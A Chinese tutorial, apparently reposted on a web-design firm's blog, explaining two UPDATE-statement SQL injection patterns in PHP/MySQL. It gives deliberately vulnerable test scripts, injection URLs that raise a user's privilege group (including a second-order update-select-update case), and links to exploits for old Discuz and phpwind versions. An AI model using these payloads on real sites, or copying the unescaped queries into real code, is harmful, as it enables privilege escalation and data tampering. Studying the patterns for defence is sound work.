UPDATE注射的兩個(gè)模式是什么-創(chuàng)新互聯(lián)

今天就跟大家聊聊有關(guān)UPDATE注射的兩個(gè)模式是什么,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

目前成都創(chuàng)新互聯(lián)已為數(shù)千家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)站空間、網(wǎng)站托管運(yùn)營(yíng)、企業(yè)網(wǎng)站設(shè)計(jì)、墊江網(wǎng)站維護(hù)等服務(wù),公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長(zhǎng),共同發(fā)展。

  一.測(cè)試環(huán)境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33 

  二.測(cè)試數(shù)據(jù)庫(kù)結(jié)構(gòu):

  ----start---

  -- 數(shù)據(jù)庫(kù): `test`

  -- 

  -- --------------------------------------------------------

  -- 

  -- 表的結(jié)構(gòu) `userinfo`

  -- 

  CREATE TABLE `userinfo` (

  `groudid` varchar(12) NOT NULL default ’1’,

  `user` varchar(12) NOT NULL default ’heige’,

  `pass` varchar(122) NOT NULL default ’123456’

  ) ENGINE=MyISAM DEFAULT CHARSET=latin1;

  -- 

  -- 導(dǎo)出表中的數(shù)據(jù) `userinfo`

  -- 

  INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

  ------end-------

  三.測(cè)試模式:

  1,變量沒有帶’’或""[MOD1]

  <?php

  //test1.php Mod1

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

  $sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號(hào)

  $result = mysql_db_query($dbname, $sql);

  $userinfo = mysql_fetch_array($result);

  echo "

SQL Query:$sql

";

  ?>

  腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權(quán)限等級(jí),我們的目的就是通過構(gòu)造$p 來(lái)達(dá)

  到修改groupid的目的:

  那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查詢: mysql> select * from userinfo;

  +---------+-------+--------+

  | groudid | user | pass  |

  +---------+-------+--------+

  | 1    | heige | 123456 |

  +---------+-------+--------+

  1 row in set (0.01 sec)

  用戶heige的groudid又2改為1了 :)

  所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個(gè)就是我們的模式1。

  2,變量帶’’或""[MOD2]

  ?php

  //test2.php

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)

  $result = mysql_db_query($dbname, $sql);

  $userinfo = mysql_fetch_array($result);

  echo "

SQL Query:$sql

";

  ?>

  為了關(guān)閉’我們構(gòu)造$p應(yīng)該為123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了’

  提交的語(yǔ)句變成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

  mysql查詢:

mysql> select * from userinfo;

  +---------+-------+--------------------+

  | groudid | user | pass        |

  +---------+-------+--------------------+

  | 2    | heige | 123456’,groudid=’1 |

  +---------+-------+--------------------+

  1 row in set (0.00 sec)

  groudid并沒有被修改。那么在變量被’’或""時(shí) 就完全沒有被注射呢?不是 下面我們看模式2: <?php

  //test3.php Mod2

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號(hào)

  $result = mysql_db_query($dbname, $sql);

  mysql_fetch_array($result);  //$p的數(shù)據(jù)寫入數(shù)據(jù)庫(kù)

  $sql= "select pass from userinfo where user=’heige’"; 

  $result = mysql_db_query($dbname, $sql);

  $userinfo=mysql_fetch_array($result); 

  echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]

  $sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

  $result = mysql_db_query($dbname, $sql);

  mysql_fetch_array($result); //把$userinfo[0] 再次update

  ?>

  我們測(cè)試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

  回mysql查詢下 : mysql> select * from userinfo;

  +---------+-------+--------+

  | groudid | user | pass  |

  +---------+-------+--------+

  | 1    | heige | 123456 |

  +---------+-------+--------+

  1 row in set (0.00 sec)

  HaHa~~ 成功注射 修改groudid為1。 這個(gè)就是我們的模式2了,簡(jiǎn)單的描敘如下:

  update--&gtselect--&gtupdate

  四.實(shí)際模式

  模式1:Discuz 2.0/2.2 register.php 注射 

  漏洞分析:http://4ngel.net/article/41.htm

  Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

  模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞 

    漏洞分析:

  update (profile.php 注射變量為$proicon update語(yǔ)句里為,icon=’$userdb[icon]’)

  |

  v

  select (jop.php)

  |

  v

  updtate (jop.php)

  Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

看完上述內(nèi)容,你們對(duì)UPDATE注射的兩個(gè)模式是什么有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注創(chuàng)新互聯(lián)-成都網(wǎng)站建設(shè)公司行業(yè)資訊頻道,感謝大家的支持。

網(wǎng)站欄目:UPDATE注射的兩個(gè)模式是什么-創(chuàng)新互聯(lián)
URL分享:http://muchs.cn/article26/ddscjg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站內(nèi)鏈、商城網(wǎng)站網(wǎng)站建設(shè)、云服務(wù)器、做網(wǎng)站營(yíng)銷型網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

網(wǎng)站優(yōu)化排名